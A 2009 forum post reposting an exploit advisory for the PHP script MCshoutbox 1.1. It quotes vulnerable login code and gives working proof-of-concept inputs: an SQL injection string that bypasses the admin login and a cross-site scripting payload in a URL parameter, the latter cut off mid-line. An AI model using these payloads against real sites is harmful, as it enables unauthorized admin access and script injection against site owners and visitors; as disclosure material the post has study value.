Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
by Foxi Thu Jul 23, 2009 4:27 am
- Code:
###########################################################################################
[+] MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################
Homepage : http://www.maniacomputer.com/dload/MCshoutbox_Download_Page.html
[+] SQL Injection Login Bypass
- Note : magic_quotes_gpc = off
- Vulnerable code in scr_login.php
----------------------------------------------------------------------------------------------------------------------------------------------------------------
$admin_name = trim($_REQUEST[ 'username' ]);
$admin_password = trim($_REQUEST[ 'password' ]);
connect($host,$username,$password,$database);
$query = "SELECT * FROM admin_tbl WHERE admin_name = ''or''='' AND
admin_password = ''or''=''" ;
----------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
URL : http://127.0.0.1/[path]/admin_login.php
Username : 'or''='
Password : 'or''='
[+] Cross-Site scripting
- Vulnerable code in admin_login.php
----------------------------------------------------------------------------------------------------------------------------------------------------------------
if(isset($loginerror)){ ?>
<tr>
<td colspan="2" align="center" style="font-size:18px;
color:#FFFFFF;" ><?echo $loginerror?></td>
----------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
http://127.0.0.1/[path]/admin_login.php?loginerror=<script>alert(document